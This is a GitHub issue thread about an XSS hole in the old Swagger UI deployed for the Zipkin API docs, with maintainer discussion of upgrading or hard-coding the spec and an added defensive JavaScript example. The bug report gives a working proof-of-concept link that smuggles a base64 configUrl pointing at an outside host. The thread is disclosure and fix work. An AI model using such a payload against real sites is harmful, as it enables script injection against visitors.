Closed Iieitaimus closed 7 months ago
Up for updating the swagger UI?
gh-pages branch https://github.com/openzipkin/zipkin-api/tree/gh-pages is where the UI is, so help wanted updating it! cc @SamTV12345 if you have time.
Note that I have no guarantee that this will actually solve the XSS, so probably want to read the docs and see if there's a config required also, and if that config already exists for the current version we expose on the website.
Could you please point me to how this API is built 😃? I found this library named Sway which hasn't received any updates in 5 years.
sure.. here was my note on the last commit that did anything notable https://github.com/openzipkin/zipkin-api/commit/72928f0bfcbe2d50a3b7d3f9743065407e3ced06 (remember the PR has to be on the gh-pages branch)
so, unzip a release and see if it fixes the XSS.. there may be some drift on changes. Anything not obviously ours it doesn't touch on unzip probably needs to be deleted (things that were from an old version) https://github.com/swagger-api/swagger-ui/releases
@SamTV12345 so simply using the new version of swagger didn't remove the XSS. Using "killing this XSS" as a goal, let's look into your custom build (from master). For example, possibly we can just remove the form and hard-code the swagger, as well as source it locally vs via an absolute href.
Wanna go for it?
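The hard-coding approach proposed in the comment above, as an added example (not code from the zipkin-api project or from anyone in this thread): the first function decodes what the PoC link from the issue actually carries, the second is the origin/scheme check a deployment would need if it ever honoured a spec URL from the query string, and the third builds a SwaggerUIBundle options object that never reads location.search at all. The spec path `./zipkin-api.yaml` and the allow-listed origin are assumptions; `queryConfigEnabled` is taken from Swagger UI's documented configuration options and should be checked against the version actually deployed, as the thread itself suggests.

```javascript
// Added example, not code from the zipkin-api project or from anyone in this thread.
// Part 1 decodes the PoC link from the issue; parts 2 and 3 show the hardened
// handling the thread suggests (spec URL hard-coded, query string not trusted).

// 1. Decode the configUrl query parameter. In the PoC it is a data: URL whose
//    base64 payload is a Swagger UI config JSON with an attacker-chosen "url",
//    so the UI fetches and renders a spec from a host the attacker controls.
function decodeConfigUrlParam(href) {
  const configUrl = new URL(href).searchParams.get("configUrl");
  if (configUrl === null) return null;
  const m = /^data:([^;,]*)(?:;charset=[^;,]*)?;base64,(.*)$/i.exec(configUrl);
  if (!m) return { kind: "remote", configUrl };          // e.g. https://... pointing off-site
  const json = atob(m[2]);                               // payload is plain ASCII JSON here
  return { kind: "data", mediaType: m[1], config: JSON.parse(json) };
}

// 2. Only accept a spec URL from the query string when it is http(s) and on an
//    allow-listed origin. Anything else (data:, javascript:, third-party hosts)
//    is rejected; a configUrl override is never honoured at all.
function safeSpecUrlFromQuery(href, allowedOrigin) {
  const params = new URL(href).searchParams;
  if (params.has("configUrl")) return null;              // remote config is never trusted
  const candidate = params.get("url");
  if (candidate === null) return null;
  let parsed;
  try { parsed = new URL(candidate, href); } catch { return null; }
  if (parsed.protocol !== "https:" && parsed.protocol !== "http:") return null;
  if (parsed.origin !== allowedOrigin) return null;
  return parsed.href;
}

// 3. Hardened initializer: build the options for SwaggerUIBundle() from a
//    pinned, same-origin spec path and never from location.search.
//    "./zipkin-api.yaml" is an assumed path; queryConfigEnabled is the Swagger UI
//    option that governs query-string overrides (verify it for the deployed version).
const PINNED_SPEC = "./zipkin-api.yaml";

function buildSwaggerConfig() {
  return {
    url: PINNED_SPEC,
    dom_id: "#swagger-ui",
    queryConfigEnabled: false,
  };
}

// Usage in the page's index.html (assumed): SwaggerUIBundle(buildSwaggerConfig());
```

Decoding the PoC link this way makes the mechanism plain: the payload is just `{"url":"https://exuberant-ice.surge.sh/test.yaml"}`, so whatever Swagger UI does with a remote spec, it will do with one the attacker wrote. Pinning the spec and leaving query overrides disabled removes that input entirely, which is why it is a safer fix than chasing individual payloads.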
To actually deploy the whole site to GH pages, edit/rename build-bin/idl_to_gh_pages to build-bin/dist_to_gh_pages and make sure the IDL ends up in the dist ;)
note, the current deployed swagger UI is not popping this up https://zipkin.io/zipkin-api/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==
Describe the Bug
There is an old Swagger-UI running, exposed at https://zipkin.io/zipkin-api/. It's possible to execute JS.
Steps to Reproduce
POC alert box:
https://zipkin.io/zipkin-api/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==